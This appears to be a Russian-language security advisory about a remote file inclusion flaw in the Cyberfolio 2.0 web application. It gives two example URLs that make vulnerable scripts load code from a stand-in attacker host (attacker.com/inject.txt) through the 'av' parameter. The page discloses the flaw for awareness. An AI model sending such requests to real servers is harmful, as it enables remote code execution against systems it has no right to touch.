• Партнер

  • Программа: Cyberfolio 2.0

    Уязвимость позволяет злоумышленнику выполнить произвольный сценарий на целевой системе. Уязвимость существует из-за ошибки в обработке входных данных различными сценариями. Атакующий может выполнить произвольный сценарий на целевой системе в контексте безопасности запущенного Web сервера.

    Примеры:

    http://target.com/cyberfolio/portfolio/ msg/view.php?av=http://attacker.com/inject.txt?
    http://target.com/cyberfolio/portfolio/ admin/incl_voir_compet.php?av= http://attacker.com/inject.txt?

     

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии